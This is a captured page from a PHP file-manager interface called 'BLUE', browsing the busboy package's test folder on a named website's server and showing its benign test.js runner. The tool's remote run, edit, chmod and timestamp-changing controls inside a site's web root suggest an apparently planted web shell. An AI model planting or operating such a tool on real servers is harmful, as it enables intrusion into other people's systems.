BLUE
PHP 7.4.33
Path:
/var/www/cookieconsent.bitkit.dk/httpdocs/node_modules/busboy/test
Run
Logout
Edit File
Size: 539 B
Close
/var/www/cookieconsent.bitkit.dk/httpdocs/node_modules/busboy/test/test.js
Text
Base64
'use strict'; const { spawnSync } = require('child_process'); const { readdirSync } = require('fs'); const { join } = require('path'); const files = readdirSync(__dirname).sort(); for (const filename of files) { if (filename.startsWith('test-')) { const path = join(__dirname, filename); console.log(`> Running ${filename} ...`); const result = spawnSync(`${process.argv0} ${path}`, { shell: true, stdio: 'inherit', windowsHide: true }); if (result.status !== 0) process.exitCode = 1; } }
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 6
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
common.js
2.73 KB
lrw-r--r--
2025-06-16 05:45:40
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
test-types-multipart-charsets.js
2.01 KB
lrw-r--r--
2025-06-16 05:45:40
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
test-types-multipart-stream-pause.js
2.31 KB
lrw-r--r--
2025-06-16 05:45:40
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
test-types-multipart.js
29.31 KB
lrw-r--r--
2025-06-16 05:45:40
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
test-types-urlencoded.js
10.95 KB
lrw-r--r--
2025-06-16 05:45:40
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
test.js
539 B
lrw-r--r--
2025-06-16 05:45:40
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).